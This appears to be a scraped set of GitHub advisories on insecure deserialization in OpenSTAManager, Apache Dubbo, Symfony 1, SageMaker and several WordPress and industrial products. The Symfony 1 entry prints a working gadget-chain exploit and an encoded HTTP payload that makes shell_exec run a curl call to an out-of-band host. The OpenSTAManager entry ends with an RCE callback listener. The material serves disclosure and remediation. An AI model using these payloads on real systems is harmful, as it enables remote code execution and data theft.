HTTPServer((\"0.0.0.0\", args.port), CallbackHandler)\n    print(f\"\\n  {BLUE}{\u0027=\u0027 * 58}{RESET}\")\n    print(f\"  {BLUE}{BOLD}  OpenSTAManager v2.10.1 \u2014 RCE Callback Listener{RESET}\")\n    print(f\"  {BLUE}{\u0027=\u0027 * 58}{RESET}\")\n    print(f\"  {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}\")\n    print(f\"  {YELLOW}[!]{RESET} Waiting for callback...\\n\")\n\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(f\"\\n  {YELLOW}[!]{RESET} Stopped.\")\n        sys.exit(0)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n## Impact\n\n- **Confidentiality**: Read server files, database credentials, API keys\n- **Integrity**: Write files, install backdoors, modify application code\n- **Availability**: Delete files, denial of service\n- **Scope**: Command execution as `www-data` allows pivoting to other systems on the network\n\n## Proposed remediation\n\n### Option A: Restrict `unserialize()` (recommended)\n\n```php\n// src/Models/OAuth2.php \u2014 checkTokens() and getAccessToken()\n$access_token = $this-\u003eaccess_token\n    ? unserialize($this-\u003eaccess_token, [\u0027allowed_classes\u0027 =\u003e [AccessToken::class]])\n    : null;\n```\n\n### Option B: Use safe serialization\n\nReplace `serialize()`/`unserialize()` with `json_encode()`/`json_decode()` for storing OAuth2 tokens.\n\n### Option C: Authenticate `oauth2.php`\n\nRemove `$skip_permissions = true` and require authentication for the OAuth2 callback endpoint, or validate the `state` parameter against a value stored in the user\u0027s session.\n\n## Credits\nOmar Ramirez",
  "id": "GHSA-whv5-4q2f-q68g",
  "modified": "2026-04-06T17:17:57Z",
  "published": "2026-04-01T19:46:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in OAuth2"
}

GHSA-WHWW-V56C-CGV2

Vulnerability from github – Published: 2022-02-10 22:39 – Updated: 2021-05-10 21:50
VLAI
Summary
Deserialization of Untrusted Data in Apache Dubbo
Details

This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.dubbo:dubbo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.dubbo:dubbo-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-1948"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-10T21:50:14Z",
    "nvd_published_at": "2020-07-14T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below.",
  "id": "GHSA-whww-v56c-cgv2",
  "modified": "2021-05-10T21:50:14Z",
  "published": "2022-02-10T22:39:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1948"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbaa41711b3e7a8cd20e9013737423ddd079ddc12f90180f86e76523c%40%3Csecurity.dubbo.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://nsfocusglobal.com/apache-dubbo-remote-code-execution-vulnerability-cve-2020-1948-threat-alert"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Deserialization of Untrusted Data in Apache Dubbo"
}

GHSA-WJH3-6952-CJVW

Vulnerability from github – Published: 2022-05-24 00:00 – Updated: 2022-06-08 00:00
VLAI
Details

The affected Cognex product, the In-Sight OPC Server versions v5.7.4 (96) and prior, deserializes untrusted data, which could allow a remote attacker access to system level permission commands and local privilege escalation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-32935"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-23T19:16:00Z",
    "severity": "CRITICAL"
  },
  "details": "The affected Cognex product, the In-Sight OPC Server versions v5.7.4 (96) and prior, deserializes untrusted data, which could allow a remote attacker access to system level permission commands and local privilege escalation.",
  "id": "GHSA-wjh3-6952-cjvw",
  "modified": "2022-06-08T00:00:58Z",
  "published": "2022-05-24T00:00:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32935"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-224-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WJQP-GQV9-X8VX

Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-26 18:31
VLAI
Details

Deserialization of Untrusted Data vulnerability in AncoraThemes Morning Records morning-records allows Object Injection.This issue affects Morning Records: from n/a through <= 1.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-22505"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T17:16:32Z",
    "severity": "HIGH"
  },
  "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes Morning Records morning-records allows Object Injection.This issue affects Morning Records: from n/a through \u003c= 1.2.",
  "id": "GHSA-wjqp-gqv9-x8vx",
  "modified": "2026-03-26T18:31:31Z",
  "published": "2026-03-25T18:31:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22505"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/morning-records/vulnerability/wordpress-morning-records-theme-1-2-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WJR9-HJ62-43J7

Vulnerability from github – Published: 2025-02-15 12:30 – Updated: 2025-02-15 12:30
VLAI
Details

The s2Member Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 241216 via deserialization of untrusted input from the 's2member_pro_remote_op' vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12562"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-15T10:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "The s2Member Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 241216 via deserialization of untrusted input from the \u0027s2member_pro_remote_op\u0027 vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.",
  "id": "GHSA-wjr9-hj62-43j7",
  "modified": "2025-02-15T12:30:50Z",
  "published": "2025-02-15T12:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12562"
    },
    {
      "type": "WEB",
      "url": "https://s2member.com/changelog"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/65192fdb-86db-475a-8c61-4db922920cfe?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WJV8-PXR6-5F4R

Vulnerability from github – Published: 2024-03-18 20:36 – Updated: 2025-05-15 21:21
VLAI
Summary
Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency
Details

Summary

Symfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project.

Details

This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:

 public function executeIndex(sfWebRequest $request)
  {
    $a = unserialize($request->getParameter('user'));
  }

We will make the assumption this is the case in the rest of this explanation.

Symfony 1 depends on Swift Mailer which is bundled by default in vendor directory in the default installation since 1.3.0. Swift Mailer classes implement some __destruct() methods like for instance Swift_KeyCache_DiskKeyCache :

  public function __destruct()
  {
    foreach ($this->_keys as $nsKey=>$null)
    {
      $this->clearAll($nsKey);
    }
  }

This method is called when php destroy the object in memory. However, it is possible to include any object type in $this->_keys to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on foreach($this->_keys ...) for any class implementing ArrayAccess interface. sfOutputEscaperArrayDecorator implements such interface. Here is the call made on offsetGet():

  public function offsetGet($offset)
  {
    return sfOutputEscaper::escape($this->escapingMethod, $this->value[$offset]);
  }

Which trigger escape() in sfOutputEscaper class with attacker controlled parameters from deserialized object with $this->escapingMethod and $this->value[$offset]:

  public static function escape($escapingMethod, $value)
  {
    if (null === $value)
    {
      return $value;
    }

    // Scalars are anything other than arrays, objects and resources.
    if (is_scalar($value))
    {
      return call_user_func($escapingMethod, $value);
    }

Which calls call_user_func with previous attacker controlled input.

However, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer.

Concreetly, __wakeup() have been implemented to clear attributes' values:

  public function __wakeup()
  {
      $this->keys = [];
  }

And/or prevent any deserialization:

  public function __wakeup()
  {
      throw new \BadMethodCallException('Cannot unserialize '.__CLASS__);
  }

If you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock:

{
  "name": "friendsofsymfony1/symfony1",
  "version": "v1.5.15",
  "source": {
      "type": "git",
      "url": "https://github.com/FriendsOfSymfony1/symfony1.git",
      "reference": "9945f3f27cdc5aac36f5e8c60485e5c9d5df86f2"
  },
  "require": {
      "php": ">=5.3.0",
      "swiftmailer/swiftmailer": "~5.2 || ^6.0"
  },
  ...
  {
    "name": "swiftmailer/swiftmailer",
    "version": "v6.3.0",
  ...
  }
}

By reviewing releases archives, composer.json targets vulnerable branch 5.x before Symfony 1.5.13 included:

{
    "name": "friendsofsymfony1/symfony1",
    "description": "Fork of symfony 1.4 with dic, form enhancements, latest swiftmailer and better performance",
    "type": "library",
    "license": "MIT",
    "require": {
        "php" : ">=5.3.0",
        "swiftmailer/swiftmailer": "~5.2"
    },
    ...

So, the gadget chain is valid for at least versions until 1.5.13.

However, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer:

[submodule "lib/vendor/swiftmailer"]
    path = lib/vendor/swiftmailer
    url = https://github.com/swiftmailer/swiftmailer.git
    branch = 5.x
[submodule "lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine"]
    path = lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine
    url = https://github.com/FriendsOfSymfony1/doctrine1.git

And branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 31, 2018.

PoC

So we need the following object to trigger an OS command like shell_exec("curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)");:

object(Swift_KeyCache_DiskKeyCache)#88 (4) {
  ["_stream":"Swift_KeyCache_DiskKeyCache":private]=>
  NULL
  ["_path":"Swift_KeyCache_DiskKeyCache":private]=>
  string(25) "thispathshouldneverexists"
  ["_keys":"Swift_KeyCache_DiskKeyCache":private]=>
  object(sfOutputEscaperArrayDecorator)#89 (3) {
    ["count":"sfOutputEscaperArrayDecorator":private]=>
    NULL
    ["value":protected]=>
    array(1) {
      [1]=>
      string(66) "curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)"
    }
    ["escapingMethod":protected]=>
    string(10) "shell_exec"
  }
  ["_quotes":"Swift_KeyCache_DiskKeyCache":private]=>
  bool(false)
}

We craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before: * gadgets.php:

class Swift_KeyCache_DiskKeyCache
{
  private $_path;
  private $_keys = array();
  public function __construct($keys, $path) {
    $this->_keys = $keys;
    $this->_path = $path;
  }
}

class sfOutputEscaperArrayDecorator
{
  protected $value;
  protected $escapingMethod;
  public function __construct($escapingMethod, $value) {
    $this->escapingMethod = $escapingMethod;
    $this->value = $value;
  }
}
  • chain.php:
namespace GadgetChain\Symfony;

class RCE12 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '1.3.0 < 1.5.15';
    public static $vector = '__destruct';
    public static $author = 'darkpills';
    public static $information = 
        'Based on Symfony 1 and Swift mailer in Symfony\'s vendor';

    public function generate(array $parameters)
    {
        $cacheKey = "1";
        $keys = new \sfOutputEscaperArrayDecorator($parameters['function'], array($cacheKey => $parameters['parameter']));
        $path = "thispathshouldneverexists";
        $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path);

        return $cache;
    }
}

And trigger the deserialization with an HTTP request like the following on a dummy test controller:

POST /frontend_dev.php/test/index HTTP/1.1
Host: localhost:8001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532

user=a%3A2%3A%7Bi%3A7%3BO%3A27%3A%22Swift_KeyCache_DiskKeyCache%22%3A2%3A%7Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_path%22%3Bs%3A25%3A%22thispathshouldneverexists%22%3Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_keys%22%3BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A1%3Bs%3A66%3A%22curl+https%3A%2F%2Fh0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7Di%3A7%3Bi%3A7%3B%7D

Note that CVSS score is not applicable to this kind of vulnerability.

Impact

The attacker can execute any PHP command which leads to remote code execution.

Recommendation

As with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake?

In this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed

Or if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 1.5.13"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/symfony1"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.5.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.4.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "swiftmailer/swiftmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "6.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28859"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-18T20:36:06Z",
    "nvd_published_at": "2024-03-15T23:15:08Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSymfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project.\n\n### Details\nThis vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:\n```php\n public function executeIndex(sfWebRequest $request)\n  {\n    $a = unserialize($request-\u003egetParameter(\u0027user\u0027));\n  }\n```\n\nWe will make the assumption this is the case in the rest of this explanation.\n\nSymfony 1 depends on Swift Mailer which is bundled by default in `vendor` directory in the default installation since 1.3.0. Swift Mailer classes implement some `__destruct()` methods like for instance `Swift_KeyCache_DiskKeyCache` :\n```php\n  public function __destruct()\n  {\n    foreach ($this-\u003e_keys as $nsKey=\u003e$null)\n    {\n      $this-\u003eclearAll($nsKey);\n    }\n  }\n```\n\nThis method is called when php destroy the object in memory. However, it is possible to include any object type in `$this-\u003e_keys` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on `foreach($this-\u003e_keys ...)` for any class implementing `ArrayAccess`  interface. `sfOutputEscaperArrayDecorator`  implements such interface. Here is the call made on `offsetGet()`:\n```php\n  public function offsetGet($offset)\n  {\n    return sfOutputEscaper::escape($this-\u003eescapingMethod, $this-\u003evalue[$offset]);\n  }\n```\nWhich trigger `escape()` in `sfOutputEscaper` class with attacker controlled parameters from deserialized object with `$this-\u003eescapingMethod` and `$this-\u003evalue[$offset]`:\n```php\n  public static function escape($escapingMethod, $value)\n  {\n    if (null === $value)\n    {\n      return $value;\n    }\n\n    // Scalars are anything other than arrays, objects and resources.\n    if (is_scalar($value))\n    {\n      return call_user_func($escapingMethod, $value);\n    }\n```\nWhich calls `call_user_func` with previous attacker controlled input.\n\nHowever, most recent versions of Swift Mailer are not vulnerable anymore. A fix has been done with [commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed](https://github.com/swiftmailer/swiftmailer/commit/5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed) to prevent #arbitrary deserialization. This commit has been shipped with version 6.2.5 of Swift Mailer.\n\nConcreetly, `__wakeup()` have been implemented to clear attributes\u0027 values:\n```php\n  public function __wakeup()\n  {\n      $this-\u003ekeys = [];\n  }\n```\n\nAnd/or prevent any deserialization:\n```php\n  public function __wakeup()\n  {\n      throw new \\BadMethodCallException(\u0027Cannot unserialize \u0027.__CLASS__);\n  }\n```\n\nIf you install last version 1.5 with composer, you will end-up installing last 6.x version of Swift Mailer containing the previous fixes. Here is an extract of the composer.lock:\n```json\n{\n  \"name\": \"friendsofsymfony1/symfony1\",\n  \"version\": \"v1.5.15\",\n  \"source\": {\n      \"type\": \"git\",\n      \"url\": \"https://github.com/FriendsOfSymfony1/symfony1.git\",\n      \"reference\": \"9945f3f27cdc5aac36f5e8c60485e5c9d5df86f2\"\n  },\n  \"require\": {\n      \"php\": \"\u003e=5.3.0\",\n      \"swiftmailer/swiftmailer\": \"~5.2 || ^6.0\"\n  },\n  ...\n  {\n    \"name\": \"swiftmailer/swiftmailer\",\n    \"version\": \"v6.3.0\",\n  ...\n  }\n}\n```\n\nBy reviewing releases archives, `composer.json` targets vulnerable branch 5.x before Symfony 1.5.13 included:\n```json\n{\n    \"name\": \"friendsofsymfony1/symfony1\",\n    \"description\": \"Fork of symfony 1.4 with dic, form enhancements, latest swiftmailer and better performance\",\n    \"type\": \"library\",\n    \"license\": \"MIT\",\n    \"require\": {\n        \"php\" : \"\u003e=5.3.0\",\n        \"swiftmailer/swiftmailer\": \"~5.2\"\n    },\n    ...\n```\n\nSo, the gadget chain is valid for at least versions until 1.5.13.\n\nHowever, if you install last version of Symfony with git as described in the README, Swift Mailer vendors is referenced through a git sub-module targeting branch 5.x of Swift Mailer:\n```shell\n[submodule \"lib/vendor/swiftmailer\"]\n    path = lib/vendor/swiftmailer\n    url = https://github.com/swiftmailer/swiftmailer.git\n    branch = 5.x\n[submodule \"lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine\"]\n    path = lib/plugins/sfDoctrinePlugin/lib/vendor/doctrine\n    url = https://github.com/FriendsOfSymfony1/doctrine1.git\n```\n\nAnd branch 5.x does not have the backport of the fix committed on branch 6.x. Last commit date from Jul 31, 2018.\n\n### PoC\n\nSo we need the following object to trigger an OS command like `shell_exec(\"curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)\");`:\n\n```php\nobject(Swift_KeyCache_DiskKeyCache)#88 (4) {\n  [\"_stream\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  NULL\n  [\"_path\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  string(25) \"thispathshouldneverexists\"\n  [\"_keys\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  object(sfOutputEscaperArrayDecorator)#89 (3) {\n    [\"count\":\"sfOutputEscaperArrayDecorator\":private]=\u003e\n    NULL\n    [\"value\":protected]=\u003e\n    array(1) {\n      [1]=\u003e\n      string(66) \"curl https://h0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com?a=$(id)\"\n    }\n    [\"escapingMethod\":protected]=\u003e\n    string(10) \"shell_exec\"\n  }\n  [\"_quotes\":\"Swift_KeyCache_DiskKeyCache\":private]=\u003e\n  bool(false)\n}\n```\n\nWe craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before:\n* gadgets.php:\n```php\nclass Swift_KeyCache_DiskKeyCache\n{\n  private $_path;\n  private $_keys = array();\n  public function __construct($keys, $path) {\n    $this-\u003e_keys = $keys;\n    $this-\u003e_path = $path;\n  }\n}\n\nclass sfOutputEscaperArrayDecorator\n{\n  protected $value;\n  protected $escapingMethod;\n  public function __construct($escapingMethod, $value) {\n    $this-\u003eescapingMethod = $escapingMethod;\n    $this-\u003evalue = $value;\n  }\n}\n```\n\n* chain.php:\n```php\nnamespace GadgetChain\\Symfony;\n\nclass RCE12 extends \\PHPGGC\\GadgetChain\\RCE\\FunctionCall\n{\n    public static $version = \u00271.3.0 \u003c 1.5.15\u0027;\n    public static $vector = \u0027__destruct\u0027;\n    public static $author = \u0027darkpills\u0027;\n    public static $information = \n        \u0027Based on Symfony 1 and Swift mailer in Symfony\\\u0027s vendor\u0027;\n\n    public function generate(array $parameters)\n    {\n        $cacheKey = \"1\";\n        $keys = new \\sfOutputEscaperArrayDecorator($parameters[\u0027function\u0027], array($cacheKey =\u003e $parameters[\u0027parameter\u0027]));\n        $path = \"thispathshouldneverexists\";\n        $cache = new \\Swift_KeyCache_DiskKeyCache($keys, $path);\n\n        return $cache;\n    }\n}\n```\n\nAnd trigger the deserialization with an HTTP request like the following on a dummy test controller:\n\n```http\nPOST /frontend_dev.php/test/index HTTP/1.1\nHost: localhost:8001\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 532\n\nuser=a%3A2%3A%7Bi%3A7%3BO%3A27%3A%22Swift_KeyCache_DiskKeyCache%22%3A2%3A%7Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_path%22%3Bs%3A25%3A%22thispathshouldneverexists%22%3Bs%3A34%3A%22%00Swift_KeyCache_DiskKeyCache%00_keys%22%3BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A1%3Bs%3A66%3A%22curl+https%3A%2F%2Fh0iphk4mv3e55nt61wjp9kur9if930vok.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7Di%3A7%3Bi%3A7%3B%7D\n```\n\nNote that CVSS score is not applicable to this kind of vulnerability.\n\n### Impact\nThe attacker can execute any PHP command which leads to remote code execution.\n\n### Recommendation\nAs with composer, Symfony is already using branch 6.x of Swift mailer there does not seem to be breaking change for Symfony 1 with branch 6.x? Or is it a mistake?\n\nIn this case, update submodule reference to version 6.2.5 or higher, after commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed\n\nOr if Symfony 1.5 need Swift 5.x, fork Swift mailer in a FOS/SwiftMailer repository and cherry-pick commit 5878b18b36c2c119ef0e8cd49c3d73ee94ca0fed",
  "id": "GHSA-wjv8-pxr6-5f4r",
  "modified": "2025-05-15T21:21:04Z",
  "published": "2024-03-18T20:36:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-wjv8-pxr6-5f4r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28859"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfSymfony1/symfony1/commit/edb850f94fb4de18ca53d0d1824910d6e8130166"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsofsymfony1/swiftmailer/CVE-2024-28859.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsofsymfony1/symfony1/CVE-2024-28859.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/swiftmailer/swiftmailer/CVE-2024-28859.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FriendsOfSymfony1/symfony1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency"
}

GHSA-WJVX-JHPJ-R54R

Vulnerability from github – Published: 2024-05-03 20:25 – Updated: 2024-05-03 20:25
VLAI
Summary
sagemaker-python-sdk vulnerable to Deserialization of Untrusted Data
Details

Impact

sagemaker.base_deserializers.NumpyDeserializer module before v2.218.0 allows potentially unsafe deserialization when untrusted data is passed as pickled object arrays. This consequently may allow an unprivileged third party to cause remote code execution, denial of service, affecting both confidentiality and integrity.

Impacted versions: <2.218.0.

Credit

We would like to thank HiddenLayer for collaborating on this issue through the coordinated vulnerability disclosure process.

Workarounds

Do not pass pickled numpy object arrays which originated from an untrusted source, or that could have been tampered with. Only pass pickled numpy object arrays from sources you trust.

References

If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue. [1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting

Fixed by: https://github.com/aws/sagemaker-python-sdk/pull/4557

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "sagemaker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.218.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34072"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-03T20:25:33Z",
    "nvd_published_at": "2024-05-03T11:15:22Z",
    "severity": "HIGH"
  },
